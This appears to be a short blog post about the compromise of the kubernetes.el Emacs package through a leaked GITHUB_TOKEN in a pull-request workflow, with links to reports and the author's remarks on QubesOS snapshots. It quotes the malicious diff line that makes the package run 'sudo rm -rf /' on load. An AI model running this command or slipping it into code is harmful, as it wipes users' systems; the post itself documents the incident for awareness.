kubernetes.el compromised
Table of Contents
GITHUB_TOKEN leaked via PR workflow. It added a sudo rm -rf /:
echo '# ...' curl https://github.com/kubernetes-el/kubernetes-el/commit/09e06af093bc3b5c98076177c359b812f86d371f.diff | tail -n3
# ... -;;; kubernetes.el ends here +(shell-command-to-string "sudo rm -rf / || rm -rf / || sudo rm -rf / --no-preserve-root") \ No newline at end of file
Further reading
- https://www.stepsecurity.io/blog/kubernetes-el-compromised-how-a-pwn-request-exploited-a-popular-emacs-package
- https://github.com/kubernetes-el/kubernetes-el/issues/383
- https://old.reddit.com/r/emacs/comments/1rowm5i/first_hacked_emacs_package/
- https://lists.gnu.org/archive/html/info-gnu-emacs/2026-03/msg00004.html
Opinion
Very dumb though, destructive for sure but kinda unambitious. Running in a regular subsystem would bring a big trouble, but another advantage of use QubesOS is the auto snapshots it does on VM shutdown:
[user@dom0 ~]$ qvm-volume info ix5:private pool vm-pool vid qubes_dom0/vm-ix5-private rw True source save_on_stop True snap_on_start False size 59446894976 usage 47353827113 revisions_to_keep 2 ephemeral False is_outdated False List of available revisions (for revert): 1778333700-back 1778351199-back